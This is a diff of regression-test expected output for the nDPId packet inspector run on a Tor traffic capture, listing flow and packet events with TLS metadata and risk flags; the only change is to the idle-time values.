+00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383821734359,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1383821734359,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"157.56.30.46","src_port":51104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"tor.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1383821734359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821734359,"pkt":"UlQA2EYhUlQAWul3CABFAAAoBE1AAIAGeHjAqAH8nTgeLsegAbuzcgvfGiCX\/lAUAAD2+QAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":690,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821736213} 00345{"packet_event_id":1,"packet_event_name":"packet","packet_id":690,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383821736176,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00179{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":755,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383821738213} @@ -162,34 +162,34 @@ 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1836,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822128212} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1837,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822123915,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1383822129897,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129897,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJhAAIAGdgbAqAH8W49d8sfnAbtnuw7MAAAAAIACIACSwAAAAgQFtAEDAwgBAQQC"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1383822129949,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129949,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGFtLUU5v6wKgB\/AG7x+atYj18G1cDZ4ASOQgvyAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129889,"flow_last_seen":1383822129889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1840,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1383822129889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJdAAIAGvzrAqAH81FOb+sfmAbsbVwNmAAAAAIACIAAzvwAAAgQFtAEDAwgBAQQC"} +00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822129897,"flow_last_seen":1383822129897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822129897,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1383822129897,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129897,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CJhAAIAGdgbAqAH8W49d8sfnAbtnuw7MAAAAAIACIACSwAAAAgQFtAEDAwgBAQQC"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1383822129949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129949,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADEGFtLUU5v6wKgB\/AG7x+atYj18G1cDZ4ASOQgvyAAAAgQFtAEBBAIBAwMH"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1383822129951,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129951,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJlAAIAGv0TAqAH81FOb+sfmAbsbVwNnrWI9fVAQAQCoogAAAAAAAAAA"} +00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1383822129961,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822129961,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x+fD3pw1Z7sOzYASOQgZlAAAAgQFtAEBBAIBAwMH"} +00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1383822129962,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822129962,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCJpAAIAGdhDAqAH8W49d8sfnAbtnuw7Nw96cNlAQAQCSbgAAAAAAAAAA"} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1846,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129889,"flow_last_seen":1383822129965,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":209,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822129965,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01190{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1847,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822129897,"flow_last_seen":1383822129972,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":213,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383822129972,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1849,"source":"tor.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129889,"flow_last_seen":1383822130023,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":743,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1383822130023,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"212.83.155.250","src_port":51174,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.t3i3ru.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.wohgpas45j6ucw.com","subjectDN":"CN=www.7d43ah2kikrabj.net","fingerprint":"F9:1D:5F:89:8F:D8:58:1E:45:E7:9B:A6:FD:90:95:77:FF:DD:E8:1B"}} +01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1852,"source":"tor.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822129897,"flow_last_seen":1383822130047,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":961,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383822130047,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51175,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"TLS.Tor","breed":"Potentially Dangerous","category":"VPN"},"tls": {"version":"TLSv1","client_requested_server_name":"www.gfu7hbxpfp.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"184d532a16876b78846ae6a03f654890","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"CN=www.xkgk7fdx362yyyxib.com","subjectDN":"CN=www.g6ghvisevf3ibuu5.net","fingerprint":"94:F9:FF:E2:7F:DB:1F:B8:19:65:20:6F:F6:DE:B6:A5:D5:AF:14:C7"}} 00180{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1383822130216} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":1862,"source":"tor.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1383822130168,"pkt":"AYDCAAAA\/lQA2EYhACZCQgMAAAAAAIAAUlQAwqwfAAAAAIAAUlQAwqwfgAMAABQAAgAAAAAAAAAAAAAA"} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1891,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1383822131033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822131033,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAADQGFwYm5UY1wKgB\/AG7x+hg0\/cE9LcH4IASOQjoIwAAAgQFtAEBBAIBAwMK"} -00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1892,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383822131034,"pkt":"UlQA2EYhUlQAWul3CABFAAAoCK9AAIAGwmLAqAH8JuVGNcfoAbv0twfgYNP3BVAQAQBhAQAAAAAAAAAA"} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1893,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383822130889,"flow_last_seen":1383822131034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1383822131034,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01151{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1896,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383822130889,"flow_last_seen":1383822131220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":929,"flow_tot_l4_payload_len":1139,"flow_avg_l4_payload_len":189,"midstream":0,"thread_ts_msec":1383822131220,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.jmts2id.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"e1691a31bfe345d2692da75636ddfb00","unsafe_cipher":0,"cipher":"TLS_DHE_RSA_WITH_AES_256_CBC_SHA","issuerDN":"CN=www.gg562izcxdvqdk.com","subjectDN":"CN=www.fcsyvnlemwxv5p.net","fingerprint":"C1:93:18:2C:A3:1D:AC:5F:C7:DE:17:8A:4E:B1:E8:13:BB:08:73:3A"}} +00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1383822130889,"flow_last_seen":1383822130889,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1383822130889,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"38.229.70.53","src_port":51176,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1888,"source":"tor.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1383822130889,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383822130889,"pkt":"UlQA2EYhUlQAWul3CABFAAA0CK1AAIAGwljAqAH8JuVGNcfoAbv0twffAAAAAIACIABZFwAAAgQFtAEDAwgBAQQC"} 